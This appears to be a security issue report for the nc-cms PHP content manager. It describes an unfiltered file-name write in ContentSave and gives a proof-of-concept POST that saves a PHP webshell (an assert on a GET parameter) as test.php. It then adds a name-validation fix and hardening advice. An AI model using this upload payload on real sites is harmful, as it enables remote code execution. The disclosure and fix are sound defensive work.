Hello, I found that this CMS may have a security problem (when using the default file storage).
Source:
./nc-cms/system/lib/storage/Filesystem.php:13-19
function ContentSave($name, $data)
{
    $path = NC_BASEPATH.'/../content/'.$name;
    $fh = fopen('content/'.$name, 'w') or die(NCUtility::Error("Could not open file: ".$name.". Make sure that this server has read and write permissions the /nc-cms/content folder."));
    fwrite($fh, $data);
    fclose($fh);
}
For people watching, this is only a vulnerability if the admin falls victim to some sort of XSS attack as it requires a login. I may patch at a future date regardless.
If I am seriously wrong about this in some way, please re-open an issue.
Hello, I found that this CMS may have a security problem (when using the default file storage).
Source:
./nc-cms/system/lib/storage/Filesystem.php:13-19
./nc-cms/system/lib/NCCms.class.php:382-394
The file name is directly controlled by the user without filtering.
payload:
http://localhost/nc-cms-master/nc-cms/index.php?action=save&ref=123
[POST] name=test.php&editordata=<?php assert($_GET['t']);?>
exploit:
http://localhost/nc-cms-master/nc-cms/content/test.php?t=phpinfo();
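
One way to validate the file name before the write reported in this issue, as an added example that is not nc-cms code or the maintainer's patch. The function name safeContentSave() and the policy that content names are plain identifiers (letters, digits, underscore, hyphen) are assumptions made for illustration.

```php
<?php
// Added example, not nc-cms code. safeContentSave() and the name policy
// below are assumptions made for illustration.

/**
 * Write $data to $contentDir/$name only if $name is a plain identifier.
 * Returns true on success, false if the name is rejected or the write fails.
 */
function safeContentSave(string $contentDir, string $name, string $data): bool
{
    // Allowlist: letters, digits, underscore, hyphen; 1-64 characters.
    // No dots, so no ".php" extension and no "../"; no slashes or NUL bytes.
    if (preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name) !== 1) {
        return false;
    }

    // Resolve the content directory once; fail closed if it is missing.
    $base = realpath($contentDir);
    if ($base === false || !is_dir($base)) {
        return false;
    }

    $target = $base . DIRECTORY_SEPARATOR . $name;

    // Refuse to follow a symlink planted in the content directory.
    if (is_link($target)) {
        return false;
    }

    // LOCK_EX avoids interleaved writes from concurrent saves.
    return file_put_contents($target, $data, LOCK_EX) !== false;
}

// Constructed demo: a throwaway directory and sample names.
$dir = sys_get_temp_dir() . '/nc_content_demo_' . bin2hex(random_bytes(4));
mkdir($dir, 0700);

$samples = ['home_title', 'test.php', '../index', "a\0b", 'sub/page', ''];
foreach ($samples as $name) {
    $ok = safeContentSave($dir, $name, '<p>hello</p>');
    printf("%-14s %s\n", json_encode($name), $ok ? 'saved' : 'rejected');
}

// Clean up the demo directory.
array_map('unlink', glob($dir . '/*'));
rmdir($dir);
```

Name validation is one layer; configuring the web server so that nothing under the content directory is executed as PHP is a separate control that limits the impact if a write check is ever bypassed.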